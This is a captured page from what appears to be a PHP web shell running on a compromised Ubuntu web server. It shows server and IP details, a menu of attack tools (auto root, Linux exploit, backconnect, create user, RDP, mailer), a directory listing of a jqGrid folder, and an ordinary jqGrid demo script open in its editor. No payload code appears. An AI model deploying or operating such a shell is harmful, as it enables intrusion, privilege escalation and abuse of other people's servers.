Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.137.221.114
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
JQGrid3.5 /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
i18n
[ DIR ]
drwxr-sr-x
JsonXml.js
8.96
KB
-rwxr-xr-x
grid.base.js
69.73
KB
-rwxr-xr-x
grid.celledit.js
15.8
KB
-rwxr-xr-x
grid.common.js
17.25
KB
-rwxr-xr-x
grid.custom.js
24.29
KB
-rwxr-xr-x
grid.formedit.js
60.35
KB
-rwxr-xr-x
grid.import.js
7.11
KB
-rwxr-xr-x
grid.inlinedit.js
6.6
KB
-rwxr-xr-x
grid.loader.js
2.14
KB
-rwxr-xr-x
grid.postext.js
1.56
KB
-rwxr-xr-x
grid.setcolumns.js
5.34
KB
-rwxr-xr-x
grid.subgrid.js
8.13
KB
-rwxr-xr-x
grid.tbltogrid.js
2.85
KB
-rwxr-xr-x
grid.treegrid.js
12.65
KB
-rwxr-xr-x
index.js
1.89
KB
-rwxr-xr-x
index_old.html
4.67
KB
-rwxr-xr-x
install.txt
2.08
KB
-rwxr-xr-x
jqDnR.js
1.9
KB
-rwxr-xr-x
jqModal.js
3.38
KB
-rwxr-xr-x
jquery-1.3.2.js
122.11
KB
-rwxr-xr-x
jquery-1.3.2.min.js
55.93
KB
-rwxr-xr-x
jquery-ui-1.7.2.custom.min.js
188.54
KB
-rwxr-xr-x
jquery-ui-1.7.2.custom.min.js_...
3.57
KB
-rwxr-xr-x
jquery.fmatter.js
15.97
KB
-rwxr-xr-x
jquery.jqGrid.min.js
177.73
KB
-rwxr-xr-x
jquery.js
29.16
KB
-rwxr-xr-x
jquery.searchFilter.js
30.16
KB
-rwxr-xr-x
ui.core.js
14.11
KB
-rwxr-xr-x
ui.sortable.js
38.14
KB
-rwxr-xr-x
ui.tabs.js
19.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
function showgrid() { var $image_path="http://"+window.location.host+"/"+window.location.pathname.split('/')[1]+"/css/images/"; var $url="http://"+window.location.host+"/"+window.location.pathname.split('/')[1]+"/server.php?q=2"; jQuery("#list2").jqGrid({ url:$url, datatype: "json", colNames:['Inv No','Date', 'Client', 'Amount','Tax','Total','Notes'], colModel:[ {name:'id',index:'id', width:55}, {name:'invdate',index:'invdate', width:90}, {name:'name',index:'name asc, invdate', width:100}, {name:'amount',index:'amount', width:80, align:"right", formatter: 'number'}, {name:'tax',index:'tax', width:80, align:"right", formatter: 'number'}, {name:'total',index:'total', width:80,align:"right", formatter: 'number'}, {name:'note',index:'note', width:150, sortable:false} ], rowNum:5, rowList:[10,20,30], imgpath: $image_path, pager: '#pager2', sortname: 'id', viewrecords: true, sortorder: "desc", caption:"JSON Example", footerrow : true, userDataOnFooter : true }).navGrid('#pager2',{multipleSearch:true}); jQuery("#list3").jqGrid({ url:$url, datatype: "json", colNames:['Inv No','Date', 'Client', 'Amount','Tax','Total','Notes'], colModel:[ {name:'id',index:'id', width:55}, {name:'invdate',index:'invdate', width:90}, {name:'name',index:'name asc, invdate', width:100}, {name:'amount',index:'amount', width:80, align:"right", formatter: 'number'}, {name:'tax',index:'tax', width:80, align:"right", formatter: 'number'}, {name:'total',index:'total', width:80,align:"right", formatter: 'number'}, {name:'note',index:'note', width:150, sortable:false} ], rowNum:5, rowList:[10,20,30], imgpath: $image_path, pager: '#pager3', sortname: 'id', viewrecords: true, sortorder: "desc", caption:"JSON Example", footerrow : true, userDataOnFooter : true }).navGrid('#pager3',{multipleSearch:true}); }
Close